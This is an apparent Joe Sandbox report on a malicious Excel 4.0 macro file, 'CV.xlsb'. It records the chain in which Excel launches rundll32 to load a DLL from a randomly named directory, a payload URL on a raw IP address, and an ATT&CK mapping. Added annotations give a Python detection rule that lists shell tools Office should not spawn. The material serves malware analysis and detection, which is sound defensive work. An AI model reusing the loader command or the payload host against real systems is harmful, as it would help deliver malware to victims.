Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://powerlift.acompli.net
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://settings.outlook.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://tasks.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://wus2-000.contentsync.
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://www.odwebp.svc.ms

System Summary:

Found Excel 4.0 Macro with suspicious formulas
Source: CV.xlsb | Initial sample: CALL
(CALL is the XLM function that invokes an arbitrary exported function of a DLL, which is how an Excel 4.0 macro reaches Win32 APIs without VBA.)
Found abnormal large hidden Excel 4.0 Macro sheet
Source: CV.xlsb | Initial sample: Sheet size: 777285
Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: sfc.dll
Source: classification engine | Classification label: mal76.expl.evad.winXLSB@3/5@0/1
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{938ACD9C-333E-4932-A3B0-F7ADCF65D160} - OProcSessId.dat
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\rundll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: CV.xlsb | Virustotal: Detection: 9%
Source: CV.xlsb | ReversingLabs: Detection: 14%
Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServer
Note: the command line names C:\Windows\System32\rundll32.exe while the process image is C:\Windows\SysWOW64\rundll32.exe. That is WOW64 file-system redirection: the 32-bit Excel in Program Files (x86) spawns a child, so System32 resolves to SysWOW64. When writing detections, match on the image path and the DLL argument rather than on the literal directory in the command line. The DLL itself is loaded from a randomly named directory (C:\gPOCoPl\xMtLxCb\) through its DllRegisterServer export, a loader pattern worth alerting on even without the Office parent.
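The process chain above (Excel spawning rundll32.exe with a DLL from a random directory and the DllRegisterServer export) is what a host-based rule should catch, and the SysWOW64/System32 mismatch is the kind of detail that breaks naive string matches. The rule below is an added example, not part of the report or of the Sigma rule it cites: it evaluates constructed Sysmon-style process-creation events (the ParentImage/Image/CommandLine field names are an assumption about the log source). The first event reproduces this report's command line as the sandbox renders it; the other two are constructed benign and borderline cases for contrast.

```python
"""Flag Office-spawned shells and suspicious rundll32 invocations.
Added example, not part of the sandbox report. Event field names follow
Sysmon Event ID 1 (an assumption about the log source)."""
import ntpath
import re

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe",
                  "msaccess.exe", "mspub.exe", "visio.exe", "onenote.exe"}
SHELL_CHILDREN = {"rundll32.exe", "regsvr32.exe", "cmd.exe", "powershell.exe",
                  "wscript.exe", "cscript.exe", "mshta.exe", "certutil.exe"}
# A rundll32 DLL argument with an absolute path outside these roots is untrusted.
TRUSTED_DLL_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# rundll32 syntax is <dll>,<entry point>; the DLL path may be double-quoted.
DLL_RE = re.compile(r'(?P<dll>"[^"]+\.dll"|\S+\.dll)\s*,\s*(?P<export>#?\w+)', re.IGNORECASE)


def evaluate(event):
    """Return the findings for one process-creation event and a severity."""
    parent = ntpath.basename(event["ParentImage"]).lower()
    child = ntpath.basename(event["Image"]).lower()   # image path, not the command line
    findings = []
    if parent in OFFICE_PARENTS and child in SHELL_CHILDREN:
        findings.append("office_spawns_shell")
    if child == "rundll32.exe":
        m = DLL_RE.search(event["CommandLine"])
        if m:
            dll = m.group("dll").strip('"').lower()
            if ntpath.isabs(dll) and not dll.startswith(TRUSTED_DLL_DIRS):
                findings.append("rundll32_untrusted_dll_path")
            if m.group("export").lower() == "dllregisterserver":
                findings.append("rundll32_dllregisterserver")
    severity = "high" if len(findings) >= 2 else "medium" if findings else None
    return {"findings": findings, "severity": severity}


def scan(events):
    return [dict(evaluate(e), CommandLine=e["CommandLine"]) for e in events]


# Constructed events. The first reproduces this report's chain (single quotes are
# how the sandbox renders the quoted image path); the second is Explorer opening a
# control-panel applet; the third is Office launching a Windows-directory DLL.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\SysWOW64\rundll32.exe",
     "CommandLine": r"'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServer"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\zipfldr.dll",RouteTheCall C:\Users\user\a.zip'},
]

if __name__ == "__main__":
    for r in scan(SAMPLE_EVENTS):
        print(r["severity"], r["findings"], r["CommandLine"])
```

The three findings stack: the Office parent alone is medium (Outlook legitimately hands archives to zipfldr.dll), while an Office parent plus a DLL outside Windows or Program Files plus DllRegisterServer is the chain seen in this report and scores high. Bare DLL names such as shell32.dll are not scored on path because they resolve through the loader search order, so a rule that wants to catch planted DLLs in the working directory needs the resolved module path from a load event rather than the command line.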
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (6 occurrences)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (30 occurrences)
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: rundll32.exe, 00000003.00000002.686713959.0000000004CA0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: rundll32.exe, 00000003.00000002.686713959.0000000004CA0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: rundll32.exe, 00000003.00000002.686713959.0000000004CA0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: rundll32.exe, 00000003.00000002.686713959.0000000004CA0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Note: these four strings are the standard Windows error messages for the Hyper-V Host Compute Service. Their presence in a rundll32.exe memory region is weak evidence of VM awareness on its own; before treating this as evasion, confirm which APIs the loaded DLL actually calls.

Mitre Att&ck Matrix

One technique per tactic column and row; "-" is an empty cell. A number in brackets is the superscript from the original matrix, which counts the behaviour signatures mapped to that technique.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scripting [2] | DLL Side-Loading [1] | Process Injection [1] | Masquerading [1] | OS Credential Dumping | Security Software Discovery [1] | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol [2] | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution [22] | Boot or Logon Initialization Scripts | DLL Side-Loading [1] | Rundll32 [1] | LSASS Memory | File and Directory Discovery [1] | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol [12] | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection [1] | Security Account Manager | System Information Discovery [2] | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer [3] | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting [2] | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | - | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | DLL Side-Loading [1] | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | - | Manipulate App Store Rankings or Ratings

Behavior Graph

[interactive behavior graph not reproduced; its legend distinguishes Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, language (Visual Basic, Delphi, Java, .Net C# or VB.NET, C/C++ or other), Is malicious and Internet nodes]

Screenshots

[screenshots not reproduced in this export]

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
CV.xlsb | 10% | Virustotal |
CV.xlsb | 15% | ReversingLabs | Document-Word.Trojan.Heuristic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label | Link
http://205.185.113.20/BVd1qKwd | 11% | Virustotal | - | Browse
http://205.185.113.20/BVd1qKwd | 0% | Avira URL Cloud | safe | -
https://cdn.entity. | 0% | URL Reputation | safe | -
https://wus2-000.contentsync. | 0% | URL Reputation | safe | -
https://powerlift.acompli.net | 0% | URL Reputation | safe | -
https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe | -
https://cortana.ai | 0% | URL Reputation | safe | -
https://api.aadrm.com/ | 0% | URL Reputation | safe | -
https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | Virustotal | - | Browse
https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | Avira URL Cloud | safe | -
https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe | -
https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe | -
https://officeci.azurewebsites.net/api/ | 0% | Avira URL Cloud | safe | -
https://store.office.cn/addinstemplate | 0% | URL Reputation | safe | -
https://wus2-000.pagecontentsync. | 0% | URL Reputation | safe | -
https://store.officeppe.com/addinstemplate | 0% | URL Reputation | safe | -
https://dev0-api.acompli.net/autodetect | 0% | URL Reputation | safe | -
https://www.odwebp.svc.ms | 0% | URL Reputation | safe | -
https://dataservice.o365filtering.com/ | 0% | URL Reputation | safe | -
https://officesetup.getmicrosoftkey.com | 0% | URL Reputation | safe | -
https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation | safe | -
https://apis.live.net/v5.0/ | 0% | URL Reputation | safe | -
https://asgsmsproxyapi.azurewebsites.net/ | 0% | Avira URL Cloud | safe | -
https://ncus-000.contentsync. | 0% | URL Reputation | safe | -
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | 0% | URL Reputation | safe | -
https://skyapi.live.net/Activity/ | 0% | URL Reputation | safe | -
https://dataservice.o365filtering.com | 0% | URL Reputation | safe | -
https://ovisualuiapp.azurewebsites.net/pbiagave/ | 0% | Avira URL Cloud | safe | -
https://directory.services. | 0% | URL Reputation | safe | -

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://205.185.113.20/BVd1qKwd | true | 11%, Virustotal, Browse; Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://api.diagnosticssdf.office.com | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://login.microsoftonline.com/ | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://shell.suite.office.com:1443 | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://cdn.entity. | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | URL Reputation: safe | unknown
https://api.addins.omex.office.net/appinfo/query | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://wus2-000.contentsync. | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | URL Reputation: safe | unknown
https://clients.config.office.net/user/v1.0/tenantassociationkey | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/ | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://powerlift.acompli.net | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | URL Reputation: safe | unknown
https://rpsticket.partnerservices.getmicrosoftkey.com | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | URL Reputation: safe | unknown
https://lookup.onenote.com/lookup/geolocation/v1 | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://cortana.ai | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | URL Reputation: safe | unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://cloudfiles.onenote.com/upload.aspx | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://entitlement.diagnosticssdf.office.com | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://api.aadrm.com/ | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | URL Reputation: safe | unknown
https://ofcrecsvcapi-int.azurewebsites.net/ | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://api.microsoftstream.com/api/ | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://cr.office.com | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://portal.office.com/account/?ref=ClientMeControl | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://ecs.office.com/config/v2/Office | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://graph.ppe.windows.net | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://res.getmicrosoftkey.com/api/redemptionevents | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | URL Reputation: safe | unknown
https://powerlift-frontdesk.acompli.net | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | URL Reputation: safe | unknown
https://tasks.office.com | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://officeci.azurewebsites.net/api/ | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | Avira URL Cloud: safe | unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://store.office.cn/addinstemplate | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | URL Reputation: safe | unknown
https://wus2-000.pagecontentsync. | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | URL Reputation: safe | unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid= | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://globaldisco.crm.dynamics.com | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://store.officeppe.com/addinstemplate | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | URL Reputation: safe | unknown
https://dev0-api.acompli.net/autodetect | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | URL Reputation: safe | unknown
https://www.odwebp.svc.ms | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | URL Reputation: safe | unknown
https://api.powerbi.com/v1.0/myorg/groups | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://web.microsoftstream.com/video/ | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://graph.windows.net | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://dataservice.o365filtering.com/ | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | URL Reputation: safe | unknown
https://officesetup.getmicrosoftkey.com | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | URL Reputation: safe | unknown
https://analysis.windows.net/powerbi/api | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://prod-global-autodetect.acompli.net/autodetect | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | URL Reputation: safe | unknown
https://outlook.office365.com/autodiscover/autodiscover.json | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
http://weather.service.msn.com/data.aspx | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://apis.live.net/v5.0/ | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | URL Reputation: safe | unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://management.azure.com | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://outlook.office365.com | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://incidents.diagnostics.office.com | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://clients.config.office.net/user/v1.0/ios | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://insertmedia.bing.office.net/odc/insertmedia | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://o365auditrealtimeingestion.manage.office.com | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://outlook.office365.com/api/v1.0/me/Activities | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://api.office.net | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://incidents.diagnosticssdf.office.com | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://asgsmsproxyapi.azurewebsites.net/ | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | Avira URL Cloud: safe | unknown
https://clients.config.office.net/user/v1.0/android/policies | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://entitlement.diagnostics.office.com | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://autodiscover-s.outlook.com | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://storage.live.com/clientlogs/uploadlocation | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://templatelogging.office.com/client/log | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://management.azure.com/ | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://ncus-000.contentsync. | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | URL Reputation: safe | unknown
https://login.windows.net/common/oauth2/authorize | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | URL Reputation: safe | unknown
https://graph.windows.net/ | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://api.powerbi.com/beta/myorg/imports | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://devnull.onenote.com | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://messaging.office.com/ | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://augloop.office.com/v2 | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://skyapi.live.net/Activity/ | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | URL Reputation: safe | unknown
https://clients.config.office.net/user/v1.0/mac | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://dataservice.o365filtering.com | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | URL Reputation: safe | unknown
https://onedrive.live.com | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://ovisualuiapp.azurewebsites.net/pbiagave/ | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | Avira URL Cloud: safe | unknown
https://visio.uservoice.com/forums/368202-visio-on-devices | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://directory.services. | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | URL Reputation: safe | unknown
https://login.windows-ppe.net/common/oauth2/authorize | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
https://loki.delve.office.com/api/v1/configuration/officewin32/ | DA768304-9386-4C06-A952-5E2BC6B1C13F.0.dr | false | - | high
                                                                                                                                                https://onedrive.live.com/embed?DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://augloop.office.comDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                                                                    high

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
205.185.113.20 | unknown | United States | 53667 | PONYNETUS | false

General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 320216
Start date: 19.11.2020
Start time: 07:12:34
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 10s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: CV.xlsb
Cookbook file name: defaultwindowsofficecookbook.jbs
